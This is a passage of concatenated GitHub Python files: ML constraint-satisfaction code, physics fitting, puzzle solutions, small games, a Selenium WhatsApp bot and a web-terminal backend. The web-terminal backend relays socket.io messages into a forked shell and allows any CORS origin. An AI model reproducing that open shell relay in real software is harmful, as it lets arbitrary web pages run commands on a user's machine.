funkcji\")\nplt.grid()\nplt.legend(loc=2)\nplt.savefig(\"zad1.webp\")\nplt.show()\n","repo_name":"pjastr/wd2023_egz_rozw","sub_path":"F11/zad1.py","file_name":"zad1.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37635874669","text":"import numpy as np\nimport torch\nfrom torch_geometric.utils import degree\nfrom torch_scatter import scatter_sum\n\nfrom data_utils import load_dimacs_cnf, load_dimacs_graph\nfrom const_language import Constraint_Language\n\n\nclass CSP_Data:\n \"\"\" Class to represent a binary CSP 
instance \"\"\"\n\n def __init__(self, num_vars, const_lang, edges, batch=None, path=None):\n \"\"\"\n :param num_vars: Size of the underlying domain\n :param const_lang: A Constraint_Language object that specifies the language of the instance\n :param edges: A dict of edge tensors. edges[rel] is a torch long tensor of shape 2 x m_{rel} where edges[rel]_i is the i-th edge of relation rel.\n :param batch: optional long tensor that indicates the instance in the batch which each variable belongs to.\n :path path: Optional string that holds the original path of an instance loaded from disc.\n \"\"\"\n self.num_vars = num_vars\n self.const_lang = const_lang\n self.edges = edges\n self.path = path\n\n self.batch = torch.zeros((num_vars,), dtype=torch.int64) if batch is None else batch\n self.batch_size = self.batch.max() + 1\n\n self.device = 'cpu'\n\n # degree and inverse degree needed for mean pooling\n self.var_deg = degree(torch.cat([e.reshape(-1) for e in edges.values()]), dtype=torch.float32, num_nodes=self.num_vars)\n self.var_reg = 1.0 / (self.var_deg + 1.0e-6).view(-1, 1)\n\n def to(self, device):\n # move data to given device\n self.device = device\n self.var_deg = self.var_deg.to(device)\n self.var_reg = self.var_reg.to(device)\n self.batch = self.batch.to(device)\n\n self.const_lang.to(device)\n\n for k in self.edges.keys():\n self.edges[k] = self.edges[k].to(device)\n\n @staticmethod\n def collate(data_list):\n # merge instances into one batch\n\n num_vars = sum([d.num_vars for d in data_list])\n const_lang = data_list[0].const_lang\n path = data_list[0].path\n batch = torch.cat([d.batch + i for i, d in enumerate(data_list)])\n\n # combine edges and shift variables to batch offset\n var_offset = 0\n edges = {rel: [] for rel in const_lang.relations.keys()}\n for data in data_list:\n for rel, edge_idx in data.edges.items():\n edges[rel].append(edge_idx + var_offset)\n var_offset += data.num_vars\n\n edges = {rel: torch.cat(edge_idx, dim=1) for rel, edge_idx in edges.items() if len(edge_idx) > 0}\n\n # create merged instance\n data = CSP_Data(num_vars, const_lang, edges, batch, path)\n return data\n\n def hard_assign(self, soft_assignment):\n # assign value with larges prob to each variable\n return torch.argmax(soft_assignment, dim=-1)\n\n def constraint_sat_prob(self, soft_assignment):\n \"\"\"\n :param soft_assignment: a soft variable assignment\n :return sat_prob: dictionary where sat_prob[rel] is a torch float tensor such that sat_prob[rel]_{i,t}. 
is the prob of edge i being satisfied in time step t.\n \"\"\"\n\n soft_assignment = soft_assignment.view(self.num_vars, -1, self.const_lang.domain_size)\n sat_prob = {}\n for rel, edge_idx in self.edges.items():\n # characteristic matrix\n R = self.const_lang.char_matrices[rel]\n\n # get soft assignments at each edge\n p1 = soft_assignment[edge_idx[0]]\n p2 = soft_assignment[edge_idx[1]]\n\n # compute probability\n sat_prob[rel] = (torch.matmul(p1, R) * p2).sum(dim=2)\n\n return sat_prob\n\n def count_unsat(self, soft_assignment):\n \"\"\"\n :param soft_assignment: a soft variable assignment\n :return num_unsat: tensor such that num_unsat_{i,t} is the number of unsatisfied constraints on instance i in time step t.\n \"\"\"\n hard_assignment = self.hard_assign(soft_assignment)\n num_unsat = torch.zeros((self.batch_size, hard_assignment.shape[1]), dtype=torch.int64, device=self.device)\n for rel, edge_idx in self.edges.items():\n R = self.const_lang.char_matrices[rel]\n v1 = hard_assignment[edge_idx[0]]\n v2 = hard_assignment[edge_idx[1]]\n edge_unsat = (1.0 - R[v1, v2]).long()\n num_unsat += scatter_sum(edge_unsat, self.batch[edge_idx[0]], dim=0)\n return num_unsat\n\n @staticmethod\n def load_2cnf(path):\n # load 2sat formula from disc\n\n const_lang = Constraint_Language.get_2sat_language()\n cnf = load_dimacs_cnf(path)\n cnf = [np.int64(c) for c in cnf]\n num_var = np.max([np.abs(c).max() for c in cnf])\n\n def clause_type(clause):\n # returns the relation type for a given clause\n if clause[0] * clause[1] < 0:\n return 'IMPL'\n elif clause[0] > 0:\n return 'OR'\n else:\n return 'NAND'\n\n # fill unit clauses\n cnf = [[c[0], c[0]] if len(c) == 1 else c for c in cnf]\n\n # normalize implication clauses\n cnf = [[c[1], c[0]] if clause_type(c) == 'IMPL' and c[0] > 0 else c if len(c) == 1 else c for c in cnf]\n\n edges = {rel: [] for rel in {'OR', 'IMPL', 'NAND'}}\n for i, c in enumerate(cnf):\n u = abs(c[0]) - 1\n v = abs(c[1]) - 1\n rel = clause_type(c)\n edges[rel].append([u, v])\n\n edges = {rel: torch.tensor(e).transpose(0, 1) for rel, e in edges.items() if len(e) > 0}\n data = CSP_Data(num_vars=num_var, const_lang=const_lang, edges=edges, path=path)\n return data\n\n @staticmethod\n def load_graph_maxcol(path, num_colors):\n # load graph from disc and create coloring instance\n\n nx_graph = load_dimacs_graph(path)\n const_lang = Constraint_Language.get_coloring_language(num_colors)\n\n num_vert = nx_graph.order()\n idx_map = {v: i for i, v in enumerate(nx_graph.nodes())}\n\n edge_idx = torch.tensor([[idx_map[u], idx_map[v]] for u, v in nx_graph.edges()])\n edge_idx = edge_idx.transpose(0, 1)\n edges = {'NEQ': edge_idx}\n\n data = CSP_Data(num_vars=num_vert, const_lang=const_lang, edges=edges, path=path)\n return data\n\n @staticmethod\n def load_graph_maxcut(path):\n # load graph from disc and create weighted maxcut instance\n nx_graph = load_dimacs_graph(path)\n const_lang = Constraint_Language.get_maxcut_language()\n\n num_vert = nx_graph.order()\n idx_map = {v: i for i, v in enumerate(nx_graph.nodes())}\n\n edges = {'EQ': [], 'NEQ': []}\n for u, v, w in nx_graph.edges(data='weight'):\n rel = 'NEQ' if w > 0 else 'EQ'\n edges[rel].append([idx_map[u], idx_map[v]])\n\n edges = {rel: torch.tensor(e).transpose(0, 1) for rel, e in edges.items() if len(e) > 0}\n\n data = CSP_Data(num_vars=num_vert, const_lang=const_lang, edges=edges, path=path)\n return 
data\n","repo_name":"toenshoff/RUNCSP-PyTorch","sub_path":"csp_data.py","file_name":"csp_data.py","file_ext":"py","file_size_in_byte":7012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35355472897","text":"import functools\nimport logging\n\nimport gvar as gv\nimport lsqfit as lsq\nimport natpy as nat\nimport numpy as np\n\nfrom utilities import jackknives, structure, particles, configIDs\n\n\nJackknifeEnsemble = jackknives.JackknifeEnsemble\nStructure = structure.Structure\n\n\nlogger = logging.getLogger(__name__)\nlogging.Formatter(fmt=\"%(name)s(%(lineno)d)::%(levelname)-8s: %(message)s\")\n\n\nclass Fit_1d:\n def __init__(\n self,\n fcn: callable,\n nparams: int,\n x: np.ndarray,\n y,\n y_err: np.ndarray = None,\n jackknives: list[JackknifeEnsemble] = None,\n initial_guess: list[float] = None,\n calculate_naive_chi_sq: bool = False,\n fit_jackknives: bool = False,\n ):\n self.fcn = fcn\n self.nparams = nparams\n self.x = x\n if isinstance(y[0], gv.GVar):\n if y_err is not None:\n logging.warning(\n \"y is array of gvar variables so passed y_err will be ignored.\"\n )\n if jackknives is not None and not fit_jackknives:\n logger.warning(\n \"Jackknives were supplied. Passing y as collection of gvar variables with fit_jackknives = False will result in the jackknives being ignored and the existing covariance between the gvars to be used instead.\"\n )\n elif jackknives is not None:\n logger.warning(\n \"Using existing correlation between the y data from gvars. Jackknives will only be used for the fit on a jackknife level.\"\n )\n\n # In case gvar were passed as a list\n self.y = gv.gvar(y)\n\n elif isinstance(y[0], (float, np.floating)):\n if y_err is jackknives is None:\n raise ValueError(\n \"y is array of floats so either y_err or jackknives must be non-None.\"\n )\n if y_err is None:\n logger.info(\n \"Setting uncertainties using covariance matrix from jackknives.\"\n )\n self.covariance_matrix = covariance_matrix(jackknives)\n self.y = gv.gvar(y, self.covariance_matrix)\n elif jackknives is None:\n self.y = gv.gvar(y, y_err)\n else:\n raise ValueError(\"y must be array of gvars or floats.\")\n\n if initial_guess is None:\n logger.info(\"Taking initial guess to be zero for all fit parameters.\")\n self.initial_guess = [0] * self.nparams\n else:\n self.initial_guess = initial_guess\n\n self.calculate_naive_chi_sq = calculate_naive_chi_sq\n if fit_jackknives and jackknives is None:\n raise ValueError(\"Jackknives must not be None to be fit\")\n self.jackknives = jackknives\n self.fit_jackknives = fit_jackknives\n\n def do_fit(self):\n self.average_fit = lsq.nonlinear_fit(\n data=(self.x, self.y), fcn=self.fcn, p0=self.initial_guess\n )\n\n if self.calculate_naive_chi_sq:\n diagonal_covariance_mat = gv.evalcov(self.y) * np.eye(self.y.size)\n self.uncorrelated_y = gv.gvar(gv.mean(self.y), diagonal_covariance_mat)\n self.naive_fit = lsq.nonlinear_fit(\n data=(self.x, self.y), fcn=self.fcn, p0=[gv.mean(self.average_fit.p)]\n )\n\n if self.fit_jackknives:\n self.jackknife_fits = []\n ncon = self.jackknives[0].ncon\n self.jackknife_fits_values = np.zeros(ncon)\n for icon in range(ncon):\n y_data = [\n jackknife_ensemble.jackknives[icon]\n for jackknife_ensemble in self.jackknives\n ]\n y_err = [\n jackknife_ensemble.uncertainties[icon]\n for jackknife_ensemble in self.jackknives\n ]\n \n self.jackknife_fits.append(\n lsq.nonlinear_fit(\n data=(self.x, y_data, y_err),\n fcn=self.fcn,\n p0=gv.mean(self.average_fit.p),\n )\n )\n 
self.jackknife_fits_values[icon] = self.jackknife_fits[icon].pmean\n self.jackknife_fits_values = JackknifeEnsemble(self.jackknife_fits_values)\n\ndef covariance_matrix(jackknife_ensembles: list[JackknifeEnsemble]) -> np.ndarray:\n ensemble_averages = np.asarray(\n [ensemble.ensemble_average for ensemble in jackknife_ensembles]\n )\n product_of_average = ensemble_averages[:, None] * ensemble_averages[:, None].T\n jackknives = np.asarray([ensemble.jackknives for ensemble in jackknife_ensembles])\n ncon = jackknives.shape[1]\n average_of_product = np.matmul(jackknives, jackknives.T) / ncon\n return (ncon - 1) * (average_of_product - product_of_average)\n\n\nclass PolarisabilityFit(Fit_1d):\n def __init__(\n self,\n particle: str,\n structure: Structure,\n ensemble: configIDs.PACSEnsemble,\n mass: gv.GVar,\n energy_shift: np.ndarray,\n mass_jackknives: JackknifeEnsemble = None,\n energy_shift_jackknives: list[JackknifeEnsemble] = None,\n initial_guess: float = 0,\n calculate_naive_chi_sq: bool = True,\n fit_jackknives: bool = False,\n ):\n self.particle = particle\n self.structure = structure\n self.ensemble = ensemble\n self.mass = mass\n self.energy_shift = energy_shift\n self.num_kd = energy_shift.size\n\n x = np.arange(1, self.num_kd + 1)\n\n self.landau_term = self.calculate_landau(\n mass, particle, structure, spacing=ensemble.a\n )\n y = energy_shift - self.landau_term * x\n \n if fit_jackknives and None not in (mass_jackknives, energy_shift_jackknives):\n self.mass_jackknives = mass_jackknives\n self.energy_shift_jackknives = energy_shift_jackknives\n self.landau_jackknives = self.calculate_landau(\n self.mass_jackknives.jackknives, particle, structure, spacing=ensemble.a\n )\n jackknives = [JackknifeEnsemble(self.energy_shift_jackknives[i].jackknives - self.landau_jackknives * x[i]) for i in range(self.num_kd)]\n \n else:\n jackknives = None\n\n super().__init__(\n fcn=self._quadfit,\n nparams=1,\n x=x,\n y=y,\n jackknives=jackknives,\n initial_guess=[initial_guess],\n calculate_naive_chi_sq=calculate_naive_chi_sq,\n fit_jackknives=fit_jackknives,\n )\n\n @staticmethod\n def convert_fit(fit_value: gv.GVar | np.ndarray, spacing: float, Nx = 32, Ny = 32):\n HBARC = 0.1973269718 # GeV fm\n q_d = -1/3\n return (\n -2\n * fit_value\n * nat.constants.alpha.value\n * (-1 / 3) ** 2\n * (spacing**4 * (Nx * Ny / 2 / np.pi) ** 2 / HBARC)\n )\n\n @staticmethod\n def _quadfit(x, a0):\n return x**2 * a0\n\n @staticmethod\n def calculate_landau(\n mass: float | np.ndarray, particle: str, structure: Structure, spacing: float\n ) -> float | np.ndarray:\n \n particle_charge = particles.get_particle_charge(particle, structure)\n q_d = -1 / 3\n Nx = Ny = 32\n HBARC = 0.1973269718 # GeV fm\n landau = (\n abs(particle_charge / (q_d))\n * np.pi\n / Nx\n / Ny\n * (HBARC / spacing) ** 2\n / mass\n )\n return landau\n\n\nif __name__ == \"__main__\":\n shift = np.asarray([0.0259, 0.0443])\n shift_err = np.asarray([0.0033, 0.0056])\n shift_gv = gv.gvar(shift, shift_err)\n mass = gv.gvar(1.053819, 0.011708)\n fit = PolarisabilityFit(\n \"proton_1\",\n Structure(\"uds\"),\n configIDs.PACS_ensembles[13770][\"a\"],\n mass,\n shift_gv,\n )\n fit.do_fit()\n print(fit.average_fit)\n print(fit.convert_fit(fit.average_fit.pmean, fit.ensemble.a))","repo_name":"TommiKabelitz/Physics-utilities","sub_path":"utilities/fitting.py","file_name":"fitting.py","file_ext":"py","file_size_in_byte":8064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
+{"seq_id":"3837372355","text":"from io import open\nfrom setuptools import setup\n\n\nversion = \"0.0.3\"\n\nwith open(\"README.md\", encoding=\"utf-8\") as f:\n long_description = f.read()\n\nsetup(\n name=\"pip_command\",\n version=version,\n\n author=\"pavelgs\",\n author_email=\"p6282813@yandex.ru\",\n\n description=\"lib for fast work with pip commands\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n\n url=\"https://github.com/pavelglazunov/pip-command\",\n\n license=\"Apache License, Version 2.0, see LICENSE file\",\n\n packages=[\"pip_command\"]\n)","repo_name":"pavelglazunov/pip-command","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31638124278","text":"# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\n# import sys\n# read = sys.stdin.buffer.read\n# readline = sys.stdin.buffer.readline\n# readlines = sys.stdin.buffer.readlines\n\n# 検討?分 実装分 バグとり分\n\nimport sys\nimport os\nf = open('../../input.txt', 'r')\nsys.stdin = f\n\nimport sys\nread = sys.stdin.buffer.read\nreadline = sys.stdin.buffer.readline\nreadlines = sys.stdin.buffer.readlines\nfrom collections import defaultdict\n\nn,X = map(int,readline().split())\nxyc = list(map(int,read().split()))\n\n\nlinks = [[] for _ in range(n+1)]\nit = iter(xyc)\nfor x,y,c in zip(it,it,it):\n links[x].append((c,y))\n links[y].append((c,x))\n\nnum = [-1] * (n+1)\nnum[1] = 0\nstack = [1]\nwhile(stack):\n i = stack.pop()\n for c,j in links[i]:\n if(num[j] != -1):\n continue\n num[j] = num[i] ^ c\n stack.append(j)\n\nd = defaultdict(int)\nans = 0\nfor i,num_i in enumerate(num[1:],1):\n ans += d[num_i^X]\n d[num_i] += 1\n\nprint(ans)\n","repo_name":"komajun365/competitive_programming","sub_path":"arc/arc045_old/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71888475689","text":"# leetcode 2389. 
Longest Subsequence With Limited Sum\n\nclass Solution:\n def answerQueries(self, nums: List[int], queries: List[int]) -> List[int]:\n target = list(accumulate(sorted(nums)))\n answer = list()\n for query in queries :\n answer.append(bisect_right(target,query))\n\n return answer","repo_name":"do0134/solostudy","sub_path":"algorithm/2022/12월/1225/1sol.py","file_name":"1sol.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33010048449","text":"#!/usr/bin/python3\n\nimport random\n\ng1Count = 0\ng2Count = 0\n\nfor x in range (1,10000000):\n car = random.randint(1, 3)\n guess1 = 1\n if car == 1:\n g1Count += 1\n else:\n g2Count += 1\n\nprint (\"Guess 1 Count: %d\"%g1Count)\nprint (\"Guess 2 Count: %d\"%g2Count)\n","repo_name":"ian-flint/monty","sub_path":"monty.py","file_name":"monty.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22269615510","text":"class Solution:\n def findPeakElement(self, nums: List[int]) -> int:\n i = 0 # Initialize the left pointer to the start of the array\n j = len(nums) - 1 # Initialize the right pointer to the end of the array\n \n while i < j: # Perform binary search until left and right pointers meet\n mid = int((i + j) / 2) # Calculate the middle index\n \n if nums[mid] < nums[mid + 1]: # If the element at mid is smaller than the next element\n i = mid + 1 # Move the left pointer to mid + 1\n else:\n j = mid # Otherwise, move the right pointer to mid\n \n return i # Return the index i as the peak element index\n","repo_name":"ofmukesh/Learning","sub_path":"LeetCode_Top_150/findPeakElement.py","file_name":"findPeakElement.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16002402445","text":"from selenium import webdriver\nimport time\n\nbrowser = webdriver.Chrome('/home/disciple/chromedriver')\nbrowser.get('https://web.whatsapp.com/')\n\ntime.sleep(15)\n\nuser_name = 'Whatsapp bot'\n\nuser = browser.find_element_by_xpath('//span[@title=\"{}\"]'.format(user_name))\nuser.click()\n\nmessage_box = browser.find_element_by_xpath('//*[@id=\"main\"]/footer/div[1]/div[2]/div/div[2]')\nmessage_box.send_keys('Hey, I am your whatsapp bot')\n\nmessage_box = browser.find_element_by_xpath('//*[@id=\"main\"]/footer/div[1]/div[3]/button')\nmessage_box.click()\n","repo_name":"Gurupra5ad/whatsapp-automation","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15120644716","text":"import random\nimport sys\nfrom time import sleep\n\n\nclass Game:\n def __init__(self, lower, upper, number_of_guesses):\n super().__init__()\n self.lower = lower\n self.upper = upper\n self.number_of_guess = number_of_guesses\n self.name = None\n self.guess = None\n self.sleep_time = 2 # Sleeping to add effect.\n self.secret_number = None\n self.correctly_guessed = None\n self.ending_answer = None\n\n def welcome_sequence(self):\n print(\"Hello, what is your name?\")\n self.name = input()\n\n print(f\"Well, {self.name}, I am thinking of a number between {self.lower} and {self.upper}. 
Can you guess it?\")\n sleep(self.sleep_time)\n print(f\"You have {self.number_of_guess} guesses; use them wisely.\")\n sleep(self.sleep_time)\n\n self.begin_guessing()\n\n def begin_guessing(self):\n self.secret_number = random.randint(self.lower, self.upper)\n self.correctly_guessed = False\n\n print(f\"Alright, {self.name}, start guessing by entering an integer!\")\n for guess_number in range(self.number_of_guess):\n self.grab_guess()\n if self.guess > self.secret_number:\n print(\"That's too high!\")\n elif self.guess < self.secret_number:\n print(\"That's too low!\")\n elif self.guess == self.secret_number:\n print(f\"You correctly guessed the number in {guess_number} amount of tries!\")\n self.correctly_guessed = True\n self.ending()\n self.ending()\n\n def ending(self):\n self.ending_answer = None\n\n if self.correctly_guessed:\n sleep(self.sleep_time)\n print(f\"I'm impressed {self.name}. Guessing the correct number was not an easy task.\")\n else:\n print(f\"Unfortunately you ran out of guesses. The secret number was {self.secret_number}.\")\n\n sleep(self.sleep_time)\n print(f\"What do you say {self.name}, would you like to play again? (y/n):\")\n self.ending_answer = input()\n\n if self.ending_answer == 'y':\n self.begin_guessing()\n else:\n print(\"Thanks for playing!\")\n\n sleep(self.sleep_time)\n sys.exit()\n\n def grab_guess(self):\n try:\n self.guess = int(input())\n except ValueError:\n print(\"That's not an integer, try again...\")\n self.grab_guess()\n\n\nif __name__ == '__main__':\n Game(1, 20, 5).welcome_sequence()\n","repo_name":"SinfulPhantom/Guessing-Game","sub_path":"guessing_game.py","file_name":"guessing_game.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71732261929","text":"import os, sys\nimport struct\nimport pty, fcntl, termios\nimport time\nimport array\n\nimport subprocess\nimport asyncio\n\nimport json\nimport platform\n\n\ntry:\n import socketio\nexcept ModuleNotFoundError as e:\n print(f\"module not found error: {e}\")\n print(\"trying to install module...\")\n subprocess.run(\"python3 -m pip install python-socketio\", shell=True, check=True)\n import socketio\n\ntry:\n import uvicorn\nexcept ModuleNotFoundError as e:\n print(f\"module not found error: {e}\")\n print(\"trying to install module...\")\n subprocess.run(\"python3 -m pip install uvicorn[standard]\", shell=True, check=True)\n import uvicorn\n\n\nPORT = 0\nSHELL = \"\"\nCHILD = 0\n\nclass TTY:\n pid = None\n fd = None \n\n def __init__(self):\n try:\n pid, fd = pty.fork()\n except OsError as e:\n print(f\"OSError: {e}\")\n\n if pid < 0:\n # error\n print(\"pty fork error!\")\n elif pid == CHILD:\n sys.stdout.flush()\n try:\n os.environ[\"TERM\"] = \"xterm-256color\"\n os.execl(SHELL, SHELL)\n except:\n print(\"execl failed!\")\n\n else:\n self.pid = pid\n self.fd = fd\n\n self.resize(0, 0)\n\n tcattrib = termios.tcgetattr(fd)\n tcattrib[3] = tcattrib[3] & ~(termios.ICANON)\n termios.tcsetattr(fd, termios.TCSAFLUSH, tcattrib)\n\n \n def resize(self, cols, rows):\n fcntl.ioctl(self.fd, termios.TIOCSWINSZ, struct.pack(\"HHHH\", rows, cols, 0, 0))\n\n def write(self, bytes):\n try:\n os.write(self.fd, bytes)\n except OSError as e:\n print(f\"os.write() error: {e}\")\n \n\n def read(self):\n buf = array.array('i', [0])\n query = termios.FIONREAD\n if platform.system() == \"Darwin\":\n query = termios.TIOCOUTQ\n if fcntl.ioctl(self.fd, query, buf, 1) < 0:\n print(\"error with 
fcntl.ioctl(termios.FIONREAD)\")\n return \"\"\n \n return os.read(self.fd, buf[0])\n \n def tcDrain(self):\n termios.tcdrain(self.fd)\n\n def close(self):\n self.write(b\"\\0\")\n os.close(self.fd)\n\n\ndef readSTDIN():\n buf = array.array('i', [0])\n if fcntl.ioctl(sys.stdin.fileno(), termios.FIONREAD, buf, 1) < 0:\n print(\"error with fcntl.ioctl(termios.FIONREAD)\")\n return \"\"\n \n return os.read(sys.stdin.fileno(), buf[0])\n\nserver = socketio.AsyncServer(async_mode='asgi', cors_allowed_origins=\"*\")\napp = socketio.ASGIApp(server)\n\nconnections = {}\n\nasync def ttyFN():\n while True:\n for sid, tty in connections.items():\n data = tty.read()\n if data:\n await server.emit(\"dat2fe\", data=data, to=sid)\n\n await asyncio.sleep(0.01)\n\n@server.event\nasync def connect(sid, environ, auth):\n print(f\"connection: {sid}\")\n connections[sid] = TTY()\n await server.emit(\"reqResz\", to=sid)\n\n@server.on(\"dat2be\")\nasync def dataToBackend(sid, data):\n connections[sid].write(bytes(data, \"utf-8\"))\n\n@server.on(\"resz\")\nasync def reszCB(sid, data):\n obj = json.loads(data)\n cols = int(obj[\"cols\"])\n rows = int(obj[\"rows\"])\n connections[sid].resize(cols, rows)\n\n@server.event\ndef disconnect(sid):\n print(f\"disconnect: {sid}\")\n connections[sid].close()\n connections.pop(sid)\n\n# load settings\nwith open(\"backend-config.json\") as config_file:\n contents = config_file.read()\n config = json.loads(contents)\n PORT = int(config[\"port\"])\n SHELL = config[\"shell\"]\n\nprint(f\"starting server: PORT={PORT}, SHELL={SHELL}\")\n\nloop = asyncio.new_event_loop()\nconfig = uvicorn.Config(app=app, host=\"127.0.0.1\", port=PORT, loop=loop)\ns = uvicorn.Server(config)\nfut = loop.create_task(s.serve())\nloop.create_task(ttyFN())\nloop.run_until_complete(fut)\n\n","repo_name":"theVerySharpFlat/webterm","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3860,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"641800413","text":"'''\n127. 
Word Ladder\nhttps://leetcode.com/problems/word-ladder/\n'''\n\n\nfrom collections import defaultdict, deque\n\n\n# BFS\nclass Solution:\n def ladderLength(self, beginWord: str, endWord: str, wordList: List[str]) -> int:\n wordSet = set(wordList)\n queue = deque([(beginWord, 0)])\n seen = set([beginWord])\n maskMap = defaultdict(list)\n \n for word in wordList:\n for i in range(len(word)):\n masked = word[:i] + '*' + word[i+1:]\n maskMap[masked].append(word)\n \n while queue:\n word, steps = queue.popleft()\n if word == endWord:\n return steps + 1\n for i in range(len(beginWord)):\n masked = word[:i] + '*' + word[i+1:]\n for candidate in maskMap[masked]:\n if candidate not in seen:\n seen.add(candidate)\n queue.append((candidate, steps+1))\n return 0\n\n\n# Bidirectional BFS\nclass Solution2:\n def ladderLength(self, beginWord: str, endWord: str, wordList: List[str]) -> int:\n queue_begin = deque([(beginWord)])\n queue_end = deque([(endWord)])\n seen_begin = {beginWord: 1}\n seen_end = {endWord: 1}\n maskMap = defaultdict(list)\n \n if endWord not in wordList:\n return 0\n \n for word in wordList:\n for i in range(len(word)):\n masked = word[:i] + '*' + word[i+1:]\n maskMap[masked].append(word)\n \n def bfs(queue, seen_self, seen_other):\n queue_len = len(queue)\n for _ in range(queue_len):\n word = queue.popleft()\n for i in range(len(word)):\n masked = word[:i] + '*' + word[i+1:]\n for candidate in maskMap[masked]:\n if candidate in seen_other:\n return seen_other[candidate] + seen_self[word]\n if candidate not in seen_self:\n seen_self[candidate] = seen_self[word] + 1\n queue.append((candidate))\n \n while queue_begin and queue_end:\n if len(queue_begin) <= len(queue_end):\n ans = bfs(queue_begin, seen_begin, seen_end)\n else:\n ans = bfs(queue_end, seen_end, seen_begin)\n if ans:\n return ans\n\n return 0\n","repo_name":"supawichable/leetcode","sub_path":"0127_word_ladder.py","file_name":"0127_word_ladder.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14993265039","text":"\n\nfrom math import *\nfrom numpy import *\nimport numpy\nimport pylab as p\nimport random\nimport itertools as itt\n\ndef L(x, k, X ):\n s=1.0\n for j in range(len(X)):\n if j != k:\n s *= float(x-X[j])/(X[k]-X[j])\n return s\n\n\nq=20\n\n[theta1, theta2] = mgrid[0.0: pi+pi/(q-1): pi/(q-1), 0.0: pi+pi/(q-1): pi/(q-1) ]\nz1 = numpy.vectorize(lambda t1,t2: 0.5*cos(t1))\nz2 = numpy.vectorize(lambda t1,t2: 0.5*cos(t2))\nZ1 = z1(theta1, theta2)\nZ2 = z2(theta1, theta2)\n\ntheta = arange( 0.0, pi+pi/(q-1), pi/(q-1) )\nZ = [ 0.5*cos(t) for t in theta]\n\nf = lambda x,y: cos(x*4.0*pi)*sin(y*4.0*pi)\n\nf_ = numpy.vectorize(f)\nF = f_(Z1,Z2)\n\nL2 = lambda z1,z2,i1,i2: L(z1, i1, Z )*L(z2, i2, Z ) \ng = lambda z1,z2: sum([ L2(z1,z2,i1,i2)*F[i1][i2] for (i1,i2) in itt.product(range(q),range(q)) ])\n\n\nX = [ (random.uniform(-0.5,0.5),random.uniform(-0.5,0.5)) for k in range(100) ]\n\nY1 = [ f(z1,z2) for (z1,z2) in X ]\nY2 = [ g(z1,z2) for (z1,z2) in X ]\n\n\nerr = []\nfor k in range(len(Y1)):\n try:\n err.append( log10(abs(Y1[k] -Y2[k])/abs(Y1[k])+1E-17) )\n except:\n pass\n\nimport pylab as p\np.hist(err, bins=30)\np.show()\n\n\n\n\n\n\n\n","repo_name":"nmaxwell/research","sub_path":"FIO/butterfly/approx/interp2D.py","file_name":"interp2D.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26097703503","text":"from 
__future__ import division\n\nfrom typing import Union\nimport numbers\nimport numpy\nfrom numpy import ndarray\nfrom pyproj import Proj\nfrom resippy.image_objects.earth_overhead.earth_overhead_point_calculators.abstract_earth_overhead_point_calc \\\n import AbstractEarthOverheadPointCalc\nfrom scipy.spatial.ckdtree import cKDTree\n\n\nclass IGMPointCalc(AbstractEarthOverheadPointCalc):\n def __init__(self,\n lon_array, # type: ndarray\n lat_array, # type: ndarray\n alt_array, # type: Union[ndarray, float]\n projection, # type: Proj\n ):\n self._lons = lon_array\n self._lats = lat_array\n self._npix_y, self._npix_x = lon_array.shape\n self.set_projection(projection)\n if isinstance(alt_array, numbers.Number):\n self._alts = numpy.zeros_like(lon_array)\n else:\n self._alts = alt_array\n self._bands_coregistered = True\n\n self._lons_1d = None # type: ndarray\n self._lats_1d = None # type: ndarray\n self._kd_tree = None # type: KDTree\n self.set_approximate_lon_lat_center(lon_array[int(self._npix_y/2), int(self._npix_x/2)],\n lat_array[int(self._npix_y/2), int(self._npix_x/2)])\n\n @property\n def lon_image(self):\n return self._lons\n\n @property\n def lat_image(self):\n return self._lats\n\n @property\n def alt_image(self):\n return self._alts\n\n def _pixel_x_y_alt_to_lon_lat_native(self, pixel_xs, pixel_ys, alts=None, band=None):\n return self._lons[pixel_ys, pixel_xs], self._lats[pixel_ys, pixel_xs]\n\n def _lon_lat_alt_to_pixel_x_y_native(self, lons, lats, alts, band=None):\n if self._lons_1d is None:\n self._lons_1d = numpy.ravel(self._lons)\n if self._lats_1d is None:\n self._lats_1d = numpy.ravel(self._lats)\n if self._kd_tree is None:\n kd_tree_data = numpy.transpose((self._lons_1d, self._lats_1d))\n self._kd_tree = cKDTree(kd_tree_data)\n\n distances, indices_1d = self._kd_tree.query(numpy.asarray((lons, lats)).transpose(), 6)\n indices_2d = numpy.unravel_index(indices_1d, (self._npix_y, self._npix_x))\n\n # Perform the interpolation here using an inverse distance weighted method\n distances[numpy.isclose(distances, 